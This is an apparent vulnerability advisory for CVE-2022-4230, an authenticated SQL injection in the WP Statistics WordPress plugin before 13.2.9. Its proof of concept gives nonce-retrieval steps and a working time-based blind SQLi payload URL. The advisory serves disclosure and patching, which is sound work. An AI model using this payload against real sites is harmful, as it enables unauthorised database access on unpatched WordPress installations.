WP Statistics < 13.2.9 – Authenticated SQLi | CVE 2022-4230 | Plugin Vulnerabilities

Description

The plugin does not escape a parameter, which could allow authenticated users to perform SQL Injection attacks. By default, the affected feature is available to users with the manage_options capability (admin+), however the plugin has a settings to allow low privilege users to access it as well.

Proof of Concept

Log in as a user allowed to View WP Statistic and get a nonce via https://example.com/wp-admin/admin-ajax.php?action=rest-nonce, and use it in the URL below, which will be delayed by 5s:

http://example.com/wp-json/wp-statistics/v2/metabox?_wpnonce=NONCE&name=words&search_engine=aaa%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(5)))Mdgs)--%20HsBR

Affects Plugins

Fixed in 13.2.9

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Jordy Versmissen

Submitter

Jordy Versmissen

Submitter website

https://www.j0vsec.com

Submitter twitter

Verified

Yes

WPVDB ID

a0e40cfd-b217-481c-8fc4-027a0a023312

Timeline

Publicly Published

2022-12-27 (about 1 years ago)

Added

2022-12-27 (about 1 years ago)

Last Updated

2022-12-27 (about 1 years ago)

Other

Published

Title

Published

2024-04-04

Title

WP Advanced Search <= 1.1.6 - Admin+ SQL Injection

Published

2017-12-10

Title

RegistrationMagic - Custom Registration Forms < 3.8.0.9 - Authenticated SQL Injection

Published

2023-12-04

Title

Couponis Demo < 2.2 - Unauthenticated SQL Injection

Published

2021-07-27

Title

Side Menu Lite < 2.2.6 - Authenticated SQL Injection

Published

2014-10-07

Title

Users Ultra 1.3.37 - SQL Injection